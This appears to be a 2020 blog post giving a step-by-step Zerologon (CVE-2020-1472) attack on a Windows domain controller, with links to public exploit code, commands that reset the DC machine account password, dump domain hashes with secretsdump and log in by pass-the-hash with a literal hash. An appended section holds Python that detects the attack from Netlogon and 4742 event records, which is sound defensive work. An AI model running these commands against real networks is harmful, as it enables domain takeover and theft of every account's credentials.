Netlogon Domain Controller Privilege Escalation (CVE-2020-1472)

Affected versions:

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)

Environment:

Domain controller: Windows Server 2008 R2 Standard

Attacking machine: kali-linux-2020.1 (not domain-joined, but has network access to the DC)

PoC location:

https://github.com/SecuraBV/CVE-2020-1472

Look up the NetBIOS name of the DC:

Linux:

nbtscan -v -h 192.168.1.1

Use the value shown for the Workstation Service entry.

Windows:

nbtstat -A 192.168.1.1

Check whether the DC is vulnerable:

python3 zerologon_tester.py dc-netbios-name dc-ip

Exploitation:

Exploit location:

https://github.com/dirkjanm/CVE-2020-1472

python3 cve-2020-1472-exploit.py

Pitfall, the error seen:

Unexpected error: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'.

Fix: uninstall the existing impacket packages and install the latest impacket from source.

Uninstall:

sudo apt remove --purge impacket-scripts python3-impacket
sudo apt autoremove

Install:

git clone https://github.com/SecureAuthCorp/impacket
cd impacket
sudo pip install .
sudo python3 setup.py install

Reset the password to empty, then use secretsdump to retrieve the hashes held on the DC. (What is reset here is the machine account password of the host the DC runs on, not a domain password. Changing the DC host's machine account password may break communication with other domains or DC functions such as DNS.)

python3 ./secretsdump.py  <domain-name>/<dc-machine-name>\$@<dc-ip>  -just-dc  -no-pass

Log in to the domain controller:

python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d04d7b62dc03efd51b0b8f296ab875da administrator@192.168.1.1
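For the defensive side of the procedure above, here is an added example (my own code, not from the post or from the linked tools) that classifies Windows event records for Zerologon indicators: the Netlogon events 5827 to 5831 that the August 2020 update added to the System log, and Security event 4742 when a domain controller's machine account password is changed by ANONYMOUS LOGON, which is the trace the password reset described above leaves behind. The DC account set, the ChangedAttributes field name and the sample records are constructed assumptions for this example.

```python
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Assumed (constructed) set of domain controller machine accounts for the lab domain.
DC_ACCOUNTS = {"WIN-DC01$"}

# Netlogon events added by the August 2020 (CVE-2020-1472) update, written to the System log.
NETLOGON_DENIED = {5827, 5828}                    # vulnerable secure channel denied (enforcement working)
NETLOGON_ALLOWED_VULNERABLE = {5829, 5830, 5831}  # vulnerable secure channel still allowed


@dataclass
class Finding:
    severity: str
    event_id: int
    account: str
    reason: str


def classify(event: dict) -> Optional[Finding]:
    """Return a Finding for one event record, or None if the record is not an indicator."""
    eid = event.get("EventID")
    account = event.get("SamAccountName") or event.get("TargetUserName") or "?"
    if eid in NETLOGON_DENIED:
        return Finding("info", eid, account,
                       "vulnerable Netlogon secure channel denied; the client still needs patching")
    if eid in NETLOGON_ALLOWED_VULNERABLE:
        return Finding("high", eid, account,
                       "vulnerable Netlogon secure channel allowed (compatibility mode or policy exception)")
    if eid == 4742:
        # Security log: a computer account was changed. The exploit's password reset shows up
        # as a change to the DC account's password with an ANONYMOUS LOGON subject.
        target = event.get("TargetUserName", "")
        subject = event.get("SubjectUserName", "")
        changed = set(event.get("ChangedAttributes", []))  # assumed field name (constructed)
        if target in DC_ACCOUNTS and "PasswordLastSet" in changed:
            if subject.upper() == "ANONYMOUS LOGON":
                return Finding("critical", eid, target,
                               "DC machine account password reset by ANONYMOUS LOGON (Zerologon pattern)")
            return Finding("medium", eid, target,
                           f"DC machine account password changed by {subject}; verify it was expected")
    return None


def scan(events: Iterable[dict]) -> List[Finding]:
    """Run classify over every record and keep only the indicators."""
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed sample records (not real logs); keys mirror the Windows event XML data names.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Channel": "Security", "TargetUserName": "alice", "LogonType": 3},
    {"EventID": 5827, "Channel": "System", "SamAccountName": "WS01$"},
    {"EventID": 5829, "Channel": "System", "SamAccountName": "WIN-DC01$"},
    {"EventID": 4742, "Channel": "Security", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "WIN-DC01$", "ChangedAttributes": ["PasswordLastSet"]},
    {"EventID": 4742, "Channel": "Security", "SubjectUserName": "WS01$",
     "TargetUserName": "WS01$", "ChangedAttributes": ["PasswordLastSet"]},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] event {f.event_id} {f.account}: {f.reason}")
```

On the sample data the ordinary logon and the workstation's own password rotation are ignored, the 5827 from the unpatched workstation is reported as informational, the 5829 for the DC is reported as high because the DC is still accepting vulnerable channels, and the anonymous 4742 against the DC account is the critical finding. In production the records would come from the DC's System and Security logs rather than from the inline list.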

Posted 2020-11-08 17:10 by y夏天, 286 reads, 0 comments